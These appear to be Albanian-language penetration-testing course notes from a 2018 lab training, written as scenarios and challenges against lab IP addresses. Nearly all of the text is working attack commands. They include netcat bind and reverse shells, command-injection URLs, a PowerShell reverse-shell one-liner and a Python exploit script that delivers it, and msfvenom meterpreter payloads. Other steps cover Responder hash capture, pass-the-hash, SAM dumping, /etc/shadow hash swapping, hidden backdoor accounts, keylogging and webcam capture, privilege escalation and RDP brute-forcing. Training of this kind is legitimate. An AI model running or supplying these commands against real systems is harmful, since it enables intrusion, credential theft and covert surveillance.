###INTERRUPT IN BOOT### Kur t'bohet load Grub Screen, e shtypim E mount -o remount,rw / .################################################################################## ###HAP BACKDOOR#### ne host A e hap nje port #nc -lvp 667 -e /bin/bash nga host B lidhet ne host A #nc 192.168.0.110 667 .################################################################################## ###SKENAR### ### DIRB & CURL ### 172.16.60.59 ##Target IP nje Ip me hack, enumeration, to get access, verify -e gjen linkun problematik me dirb ( directory browse) -e bon run skipten ne file e dyshimt per ta hap session root@CyberACAD:/home/dardan# curl http://172.16.60.59/index.php\?cmd\=nc+-lvp+31337+-e+/bin/bash -per tju qas sessionit te hapur me lart dardan@CyberACAD:~$ nc 172.16.60.59 31337 echo 'index.php' | base64 ## encode echo 'aW5kZXgucGhwCg==' | base64 -d ## decode .################################################################################## ###SKENAR###WORDPRESS### merr nje file #wget http://wordpress.org/latest.zip #wget http://wordpress.org/latest.tar.gz unzip #unzip latest.zip #tar -zxvf latest.tar.gz #delete latest.zip #rm -rf latest.zip barte file to var/www/html nese e ke shakrku duku tjeter #mv wordpress var/www/html barti krejt nga wordpress folderi nje hap mbrapa #mv * ../ Access mysql #mysql -u root -p #create db #create database dr; edit sample file #vi wp-config-sample.php #edit #database name / user / password replace modified file #mv wp-config-sample.php wp-config.php ne browser krijo account ne WP #http://IP ose name i appache service krijo user ne web form ###Script me kriju e cila e shkarkon wordpress edhe i exekution krejt hapat si ne ushtrime### #! /bin/bash cd /var/www/html wget http://wordpress.org/latest.zip unzip latest.zip cd wordpress mv * ../ cd .. rm -rf latest.zip wordpress cp wp-config-sample.php wp-config.php mysql -uroot -pPassword -e "create database xxDB;" Ose mysql --host=localhost --user=root -pPassword CREATE DATABASE xxDB; SHOW databases; chmode a=x wp-auto ## e bon executable bash wp-auto ## ose e bon run si script link http://www.codingpedia.org/ama/how-to-create-a-mysql-database-from-command-line/ .################################################################################## ###SKENAR###Me kriju qasje ne SSH pa u athentiku### krijo file ~/.ssh un-auth access client to server mkdir.ssh/ ##create .ssh if it is not created server@CyberACAD:~/.ssh$ ssh-keygen ## generate keys scp id_rsa.pub client@172.16.60.47:/home/client/.ssh/ client@xx:~/home/client/.ssh$ mv id_rsa.pub authorized_keys ssh server@172.16.60.47 ## try to access client to server :) #ne Server ssh-keygen touch authorized_keys cat id_rsa.pub > authotized_keys .################################################################################## ###backdoor, remote code execution, intro### curl https://google.com ##Lexon kontentin curl https://google.com/x.php?cmd\=cat+/passwd cmd\=cat+/passwd cmd\=cat+/ curl http://172.16.60.59/run.php\?cmd\=nc+-lvp+31337+-e+/bin/bash .################################################################################## ###SKENAR###me marr qasje prej mysql ne shell access### \! nc -lvp 8888 -e /bin/bash \! id nc ip 8888 ls id dw wp unzip cmv wp content to /html mysql -u root -p creat database xx; edito wp-config.php db name, user, password brows IP/wp-config.php create user/password install wordpress cd user/share/webshell create a file with code run.php upload on /html curl http://ip/run.php\?cmd\=nc+-lvp+1337+-e+bin/bash nc ip 1337 id ls cat wp-config.php python-c 'import pty; pty.spawn("/bin/bash")' mysql -u$root -p$xxxx -e "\! id" "os python libraria" ta jep mundesi me execute comanda te systemit mysql -H ip ## te qon remote .################################################################################## ###SKENAR###Challenge### 1.Keni me startu nje web apache server, me gjeneru log-sa, me gjeneru spaku 100 lines of code, keni me ndertu nje automated script me kete logjike, ku IP unike i merr dhe i kthen ne base64, dhe i ke echo vetem vlerat e base64. Pra me lexu log-un, access.log edhe me i nxjerr IP me i sortu unike dhe me i kthye vetem vlerat e tyre base64, e jo ne plain text. Startim i web apache server te gjenerimi i logsave logs of code gjenerete script ku me i nxjerr ip dhe me i kthy ip ne base 64 Zgjidhja: #!/bin/bash cat /var/log/apache2/access.log | grep "172.16" | cut -d " " -f 1 | sort -u > ips.txt for i in $(cat ips.txt); do echo $i| base64; done 2.Research qysh me shtu user pa kriju home directory- kur shkon ne Ls /home/ mos me ekzistu, basically i bjen user i fshehte Dhe ne Ssh me u kyc me kete user qe kemi krijuar pa home directory 3. Heqeni hash-in, shtoni hash-in e juaj, kycuni me passwordin e hash-it juaj, kryeni pune dhe pasi te kryeni pune ktheni hash-in qe ishte fillimisht. Eshte nje password “ubuntu” ky password e ka nje hash, ky hash nuk mundet kurre me u kthy ne “ubuntu”, gjithmone eshte ky hash value, ky hash eshte i ruajtur ne /etc/shadow, ne nuk e dijme qe ky hash e ka plain text “ubuntu”, per kete arsye duhet me e heq kete hash dhe me shtu nje hash te ri, ku ne e dijme passwrodin. Psh password e kthejme ne hash, dhe kete hash e ruajme atje ku duam ta nderrojme hashin. Pastaj mund tbejme login si password, kryjme pune dhe pastaj e kthejme hashin “ubuntu”. Ekziston encrypted sh512 ne /etc/shadow E kemi harru pass po dojme me bo access ne kete file qysh me e nderru hash qe me e nderru pass me e kry punen dhe me e kthye hashin e vjeter Sudo cat /etc/shadow Te zgjidhura nga Arbeni: Krijimi i nje useri qe nuk ka /home directory: https://asciinema.org/a/To1xwcgCmjb06umuOUGIAO2vF komanda"--no-create-home" e krijon nje user pa home directory por kur mundohemi me ju qas me ssh apo protokol tjeter nuk mundemi sepse nese e lexojm fajllin /etc/passwd e shohim qe ai user nuk ka "entry point" dmth nuk ka shell /bin/bash komanda "--no-create-home --shell /bin/bash" e ben te kunderten e komandes me lart Shtimi apo ndrrimi i passwordit te nje useri duke modifikuar fajllin /etc/shadow Ekzistojn disa metoda, 4 nder to jane: https://asciinema.org/a/zk6zChlDAhR9fIrXMz5bVPckV | chpasswd https://asciinema.org/a/hKSm9dZCY2pOqLWhAC2nr59Db | openssl https://asciinema.org/a/PKUxOrkmvLJyuk0DlISJc8Xpb | perl https://asciinema.org/a/y0mzjwp4YsoRTE17GGxwTIEcX | python ---------------------------------------------------------------------------- python -c 'import crypt; print crypt.crypt("arben123", "$6$SalTTeSt$")' perl -e 'print crypt("arben123","\$6\$saltsalt\$") . "\n"' openssl passwd -1 -salt CyBeR arben2 echo "username:password" | chpasswd .################################################################################## ###SKENAR###Challenge## 1. Me gjet nje file qe permban keys per nje protokoll te caktuar, 2. Me u lidh me nje user te caktuar duke perdorur nje komand qe te len me percaktu keyn 3. Me ekzekutu komanda te sudo dhe me lexu nje fajll ne folderin /root Me gjet nje file qe permban keys per nje protokoll te caktuar, e perdor per me u lidh me nje protokoll qe eshte i sigurt, useri nuk eshte sudo por lejohet te exe ca komanda si sudo Hint: 172.16.60.81 Cmd =cd+/root base64 Ls –al Ssh –i fajlli IP Sudo /bin/cat Comment FILES Description Add another file (Maximum size: 5 MB) Save Cancel Preview Powered by OpenProject .################################################################################## ###SKENAR##Export SAM and system file### reg save hklm\sam c:\sam reg save hklm\system c:\system ##tool per mi hap sma and system files pwdump system sam (run in folder where sam and system file are located) .################################################################################## ###SKENAR###Responder & John & PASS the HASH### RESPONDER #cd /usr/share/responder/ #python Responder.py -i 192.168.1.50 -I eth0 Simulate a user typing the wrong SMB server name using SNARE01 instead of SHARE01 Error is returned to the client machine from Responder.py that windows can not access it. #cd logs/ ls (to comfirm if hash log file is created JOHN #john SMBv2-NTLMv2-SSP-192.168.1.8.txt John hash2.txt - -wordlist=/root/Desktop/rockyou.txt John - -show hash2.txt John - -show =hash2.txt Cat john.pot john hh.txt - -wordlist=/root/Desktop/rockyou.txt john hh.txt - -show cd ~/.john Cd ~ Cd .john PASS the HASH Cd pth-toolkit-master/ ./pth-winexe -U Workgroup/User%LM:NTLM //121.0.0.1 cmd ./pth-winexe -U Workgroup/User%LM:NTLM //121.0.0.1 ‘net user a a /add’ pth-winexe -U Workgroup/Administrator%5274a8ac31638590:B206D78784758497FE2540F99BDF7BF0 //192.168.1.8 cmd xfreerdp /u:administrator /d:Workgroup /pth:B206D78784758497FE2540F99BDF7BF0 /v:192.168.1.8 *How to Secure Networks against LLMNR / NBT-NS Poisoning Attacks* The good news is this attack is fairly easy to prevent. Note, that both LLMNR and NetBIOS Name Service need to be disabled, if you only disable LLMNR then Windows will failover to NetBIOS Name Server for resolution .################################################################################## ###SKENAR###Challenge###16.05.2018 target 172.16.60.85 Ubuntu-10ubuntu0.1 PORT STATE SERVICE 80/tcp open http 1 # dirb http://172.16.60.85 http://172.16.60.85/id_rsa 2 # wget http://172.16.60.85/id_rsa # chmod 400 id_rsa # ssh -i id_rsa cyberacademy@172.16.60.85 merr qasje $ 3 $ ps -aux ## per ta par executable file $ locate xxxx.py ##per ta gjetur lokacionin $ cd /usr/bin $ python2.7 Administrator_Password.py ## ky tregon te dhenat e next target Next target was a windows its credentials was given in that file 4 - me te dhenat e gjetura qasesh RDP ne target PC - metod tjeter nga nje linux OS # rdesktop -u Administrator 172.16.65.92 -kliko easy access (do te hapet cmd nese eshte ndrequr mepare) me gjet hiden file me info te next target 5 ne next target machine $ sudo -l ##tregon comands qe munet mi bo run si user $ sudo python -c 'import pty;pty.spawn("/bin/bash");' # :) .################################################################################## ###SKENAR###Challenge###18.05.2018 Target 172.16.60.92 Basic Linux Commands https://www.youtube.com/watch?v=tgcxc1xg87Y rdesktop (ip) -r disk:share=/home/bayo/store 172.16.60.92 3389 22 445 Linux: # rdesktop 172.16.65.120 –r disk:share=/usr/share/windows-binaries Windows: > nc.exe -lvp 777 -e cmd.exe Linux: nc 172.16.60.67 777 .################################################################################## ###SKENAR###msfvenom & msfconsole### msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.68 LPORT=5560 -f exe -o foto.exe mv foto.exe tmp/ python -m SimpleHTTPServer 80 msfconsole msf > use exploit/multi/handler msf exploit(multi/handler) > show options msf exploit(multi/handler) >set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > show options msf exploit(multi/handler) > set lhost 172.16.60.68 msf exploit(multi/handler) > set lport 4477 msf exploit(multi/handler) > exploit pret deri sa te executon dikush malware, ne kete rast te hostuar ne http pasi te executohet malware vjen sessioni sessions sessions -i 5 --numrin e sesionit ################################################################################## ###SKENAR###Challenge###21.05.2018 ident. alive hosts seq 1 254 for i in $(seq 1 254); do ping -c 1 '172.16.60.'$i;done cat output.txt | grep 'bytes of data' | cut -d ' ' -f 2 nmap 172.16.60.0/24 ###1 check alived host, check top 1025 well known ports nmap -sn 172.16.60.1/24 --sn e kontrollon veq a eshte hap nmap 172.16.60.1/24 -p- -- -p- check all range ports nmap -sS -sV 172.16.1.172 -- -p5988 ### check specific port attempts on open ports found via nmap ftp try anonymous/anonymous ftp 172.16.1.19 telnet 172.16.1.19 21 telnet 172.16.1.19 pasi ke marr access ne shell ssh -R cyberacademy2018:80:localhost:80 serveo.net rtsp 554 /me vlc ne vlc network url: rtsp:172.16.1.19:554 snmp sudo msfconsole auxiliary set community filename exploit search ms17-010 windows # searchsploit "windows server 2008" # locate windows/remote/41987.py ./pth-winexe -U WOURKGROUP/user%hash //172.16.1.204 cmd ### pass the hash ---------------------------------------------------------------------------- library hijack import os import sys import random_useragent while True: ping = raw_input ("input: ") if '&&' in ping: print ;hacker....: sys.exit() elif '|' in ping: print ;hacker....: else os.system('ping {}'.format(ping)) python_py aa_py input: import os;os.system('net user a a /add') .################################################################################## ###SKENAR###SSHUTTLE###23.05.2018 ssh uttle Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling. sshuttle -r turbo@172.16.65.117 ssh -R cyberacademy2018:80:localhost:80 serveo.net http://cyberacademy.serveo.net/ google.com | ifconfig google.com| nc -lvp 5555 -e /bin/bash google.com && ls 172.16.65.117 (linux) nc 172.16.65.117 5555 te ky target me ps -aux ( e sheh nje process turbo_is_turbo) cat /etc/passwd ( per me verifiku user turbo) putty 172.16.65.117 turbo/turbo sudo -l (eshte gjet find qe ka root privilegje) sudo find /etc/passwd -exec /bin/sh \; sudo find /etc/passwd -exec nc -lvp 7878 /bin/sh \; id nc 172.16.65.117 7878 id cat info.txt (target 172.16.65.120) rdesktop 172.16.65.120 5 time shift cmd ipconfig ( e sheh qe host eshte i lidhun edhe me nje rrjete tjeter) arp -a (e sheh qe 10.0.1.4 ka komuniku me local host 10.0.1.3) scanon portet me nc ose nmpa ( gjinden 21, 22, 80) ne http te 10.0.1.4 browser tregon nje user edhe password sudo python -c 'import pty;pty.spawn("/bin/bash");' .################################################################################## ###SKENAR###Challenge PowerSHELL###25.05.2018 power shell cat oneliner.tcp ip: 172.16.60.54 nmap -sV 172.16.60.54 80 - eshte gjet hap ne local machine nc -lnvp 5588 permes web app ne target IP e run kete shell cmd google.com|powershell -command "$client = New-Object System.Net.Sockets.TCPClient('172.16.60.108',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" kjo na jep qasje ne shell te target kalo ne desktop te userit C:\users\arben\Desktop> Get-item -Path C:\Users\arben\Desktop\root.txt -stream * Get-Content -Path C:\Users\arben\Desktop\root.txt -stream target.txt cyber@172.16.60.65 pass: 123Arben123 me te dhenat e gjetura hym me ssh ssh cyber@172.16.60.65 pass: 123Arben123 $ $ sudo -l eshte gjet /bin/dash /home/cyber/root_me $ cat /home/cyber/root_me shihet permbajtja e scriptes #!/bin/dash sudo /bin/dash /home/cyber/root_me # :) root ----------------------------------------------------------------------------- nano exploit.py import os import sys import requests ip = sys.argv[1] port = sys.argv[2] r = requests.get("http://172.16.60.54/system.php?ping=google.com+%26%26+powershell+-command+%22%24client+%3D+New-Object+System.Net.Sockets.TCPClient%28%27{}%27%2C{}%29%3B%24stream+%3D+%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes+%3D+0..65535%7C%25%7B0%7D%3Bwhile%28%28%24i+%3D+%24stream.Read%28%24bytes%2C+0%2C+%24bytes.Length%29%29+-ne+0%29%7B%3B%24data+%3D+%28New-Object+-TypeName+System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C+%24i%29%3B%24sendback+%3D+%28iex+%24data+2%3E%261+%7C+Out-String+%29%3B%24sendback2++%3D+%24sendback+%2B+%27PS+%27+%2B+%28pwd%29.Path+%2B+%27%3E+%27%3B%24sendbyte+%3D+%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22".format(str(ip), port)) python exploit.py IP with listen port open + port python exploit.py 172.16.60.68 4433 .################################################################################## ###SKENAR###msfvenom### msfvenom -p windows/meterpreter/bind_tcp LPORT=4477 -f exe -o BIND_TCP.exe msfconsole > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/bind_tcp set lport 4477 set rhost 172.16.60.76 .################################################################################## ###SKENAR###msfvenom### msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.60.68 LPORT=5560 -e elf -o reverse_tcp.elf msfconsole > use exploit/multi/handler msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp > set lhost 172.16.60.68 > set lport 5560 chmod a+x reverse_tcp.elf hendler = pret ose servon .################################################################################## ###SKENAR### Challenge###30.05.2018 ===================== Target: 172.16.65.97 windows/smb/ms08_067_netapi windows/smb/psexec run post/windows/manage/enable_dp run post/windows/gather/ sysinfo netstat -a meterpreter > shell ipconfig, cd c:, reg same hkml\sam dhe system, net user, net localgroup administrators user /add net user test ters net localgroup administrators test /add net user test /active:yes net user Administrator background getsystem getuid getpid ps -- pkill 2420 migrate 1756 ##kalon ne procese keyscan_start webcam xx ##snapshot me marr webcam_stream record_mic -d 10 mdf exploit(windows/smb/psexec) > > session 2xtab > session -i 2 msf exploit(windows/ .################################################################################## ###SKENAR###msfconsole### 01.06.2018 target: 172.16.60.96 metoda: buffer overflow, banner grabbing, metasploit, search the vurnelabilities, exploitation nmap 172.16.60.96 PORT STATE SERVICE 22/tcp open ssh 80/tcp open http nmap -sV --script=banner 172.16.60.96 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7 (protocol 2.0) |_banner: SSH-2.0-OpenSSH_6.7 80/tcp open http BadBlue httpd 2.7 Service Info: Host: IEWIN7; OS: Windows; CPE: cpe:/o:microsoft:windows msf > search badblue Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/http/badblue_ext_overflow 2003-04-20 great BadBlue 2.5 EXT.dll Buffer Overflow exploit/windows/http/badblue_passthru 2007-12-10 great BadBlue 2.72b PassThru Buffer Overflow ###merr sessionin e pare msf > use exploit/windows/http/badblue_passthru msf exploit(badblue_passthru) > show options msf exploit(badblue_passthru) > set RHOST 172.16.60.96 msf exploit(badblue_passthru) > set TARGET 1 msf exploit(badblue_passthru) > exploit meterpreter > sysinfo ###e perdor sessionin e krijuar me pare use exploit/windows/local/bypassuac_injection msf exploit(bypassuac_injection) > show options msf exploit(bypassuac_injection) > set session3 1 msf exploit(bypassuac_injection) > exploit meterpreter > getuid meterpreter > getsystem meterpreter > getuid msf > use post/windows/gatherc3/credentials/sso msf post(sso) > show options msf post(sso) > set session 2 msf post(sso) > exploit [*] Running module against IEWIN7 Windows SSO Credentials ======================= AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;72208 NTLM IEWIN7 IEUser Passw0rd! 0;72208 NTLM IEWIN7 IEUser 0;72286 NTLM IEWIN7 IEUser Passw0rd! 0;72286 NTLM IEWIN7 IEUser 0;83203 NTLM IEWIN7 sshd_server D@rj33l1ng 0;83203 NTLM IEWIN7 sshd_server [*] Post module execution completed .################################################################################## ###SKENAR###nmap, hydra ose meduza###01.06.2018 root@kali:/# nmap -sV --script=banner 172.16.60.76 Nmap scan report for 172.16.60.76 Host is up (0.0066s latency). Not shown: 986 closed ports PORT STATE SERVICE VERSION 3389/tcp open ms-wbt-server Microsoft Terminal Service Service Info: Host: ARBEN-PC; OS: Windows; CPE: cpe:/o:microsoft:windows brootforce RDP me hydra ose meduza tu e perdor rockyou.txt .################################################################################## ###SKENAR###msfvenom & msfconsole### ##Challenge##04.06.2018 TARGET: 172.16.60.91 msfvenom -p python/meterpreter/reverse_tcp lhost=172.16.60.x lport=9999 -f raw >shell.py msfconsole -q use exploit/multi/handler set payload python/meterpreter/reverse_tcp show options set lhost 172.16.60.78 set lport 9999 exploit -j cat shell.py copy content of shell.py paste ne python interpreter on web pret sessionin sessions sessions -i 1 getuid shell bash python -c 'import pty; pty.spawn(/bin/bash")' ls debugger.sh cat debugger.sh ... .################################################################################## ###SKENAR### version of ftp running on target msf > use auxiliary/scanner/ftp/ftp_version msf auxiliary(ftp_version) > set RHOSTS 127.0.0.1 RHOSTS => 127.0.0.1 msf auxiliary(ftp_version) > set RPORT 21 RPORT => 21 msf auxiliary(ftp_version) > exploit [*] 127.0.0.1:21 - FTP Banner: '220 (vsFTPd 3.0.3)\x0d\x0a' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(ftp_version) > .################################################################################## ###BANNER GRABBING nmap -sS -p 80 -A 192.168.0.1